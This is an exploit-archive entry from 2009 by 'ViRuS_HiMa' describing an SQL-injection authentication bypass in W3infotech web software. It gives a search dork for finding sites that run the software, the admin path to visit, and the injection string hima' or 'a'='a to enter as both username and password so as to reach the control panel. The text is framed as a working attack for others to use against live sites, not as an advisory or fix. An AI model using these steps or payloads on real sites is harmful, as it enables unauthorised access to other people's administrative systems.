W3infotech ( Auth Bypass ) SQL Injection Vulnerability

2009-11-24T00:00:00
ID 1337DAY-ID-10010
Type zdt
Reporter ViRuS_Hima
Modified 2009-11-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
W3infotech ( Auth Bypass ) SQL Injection Vulnerability
======================================================

[+]====================================================================||
[*] About    : W3infotech ( Auth Bypass ) SQL injection Vulnerability  ||
[!] Site     : http://www.w3infotech.com                               ||
[!] Author   : ViRuS_HiMa                                                                                   ||                                                                ||
[!] Location : Cairo-007                                               ||
[!]====================================================================||
[!]                  [H]eL[L] [Z]on[E] [C]re[W]                        ||
[!]====================================================================||
[!]
[!] Exploitation :                                                     ||
[!]
[!]    you can use this dork :  "Powered By W3infotech"                ||
[!]
[!]    Just add the admin path ,, so it will be :                      ||
[!]   
[!]    http://server/admin                                             ||   
[!]
[!]    then auth bypass using this password :                          ||
[!]
[!]    hima' or 'a'='a                                                 ||
[!]
[!]    it mean that you have to type the same code in user and pass    ||
[!]
[!]    what you got ?? ,, you are in the script control panel now :p   ||
[!]                                                              
[!]====================================================================||


#  0day.today [2018-04-09]  #